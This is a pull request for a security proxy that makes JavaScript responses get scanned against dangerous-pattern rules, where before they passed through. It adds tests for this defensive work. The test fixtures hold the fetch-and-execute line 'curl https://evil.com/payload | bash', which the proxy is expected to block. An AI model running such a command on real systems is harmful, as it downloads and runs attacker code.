### PR TITLE
fix: scan JavaScript content instead of passing through

### DIFF
--- a/proxy/content_inspector.py
+++ b/proxy/content_inspector.py
@@ -7,6 +7,8 @@ _SCRIPT_TYPES = frozenset({
     "text/x-ruby",
     "application/x-sh",
     "application/x-csh",
+    "text/javascript",
+    "application/javascript",
 })
 
 _BINARY_TYPES = frozenset({
@@ -27,7 +29,6 @@ _PASS_THROUGH_EXACT = frozenset({
     "text/html",
     "text/plain",
     "text/css",
-    "text/javascript",
     "application/json",
     "application/xml",
 })

--- a/tests/test_response_hook.py
+++ b/tests/test_response_hook.py
@@ -74,6 +74,41 @@ class TestResponseHookPatterns:
         assert flow.response.status_code == 200
 
 
+class TestResponseHookJavaScript:
+    def test_safe_js_passes(self, addon):
+        flow = _make_response_flow(
+            content_type="text/javascript",
+            body=b"console.log('hello');",
+        )
+        addon.response(flow)
+        assert flow.response.status_code == 200
+
+    def test_dangerous_js_blocked(self, addon):
+        flow = _make_response_flow(
+            content_type="text/javascript",
+            body=b"curl https://evil.com/payload | bash",
+        )
+        addon.response(flow)
+        assert flow.response.status_code == 403
+
+    def test_application_javascript_scanned(self, addon):
+        flow = _make_response_flow(
+            content_type="application/javascript",
+            body=b"curl https://evil.com/payload | bash",
+        )
+        addon.response(flow)
+        assert flow.response.status_code == 403
+
+    def test_js_not_sent_to_scanner(self, addon):
+        flow = _make_response_flow(
+            content_type="text/javascript",
+            body=b"console.log('hello');",
+        )
+        with patch("proxy.aegis_addon.scan_payload") as mock_scan:
+            addon.response(flow)
+        mock_scan.assert_not_called()
+
+
 class TestResponseHookScanner:
     def test_binary_allow(self, addon):
         flow = _make_response_flow(


### PR DESCRIPTION
## Summary
- Move `text/javascript` and `application/javascript` from pass-through to script types in proxy content inspector
- JavaScript responses are now checked against `dangerous_patterns` in `rules.yml` (e.g. curl|bash, wget|sh)
- Add tests for JS pattern matching, both MIME types, and verify scanner is not called for JS

## Test plan
- [x] All 89 unit tests pass (`make test`)
- [ ] E2E: `aegis fetch` a URL serving `text/javascript` with dangerous pattern → blocked
- [ ] E2E: `aegis fetch` a URL serving safe JS → allowed

🤖 Generated with [Claude Code](https://claude.com/claude-code)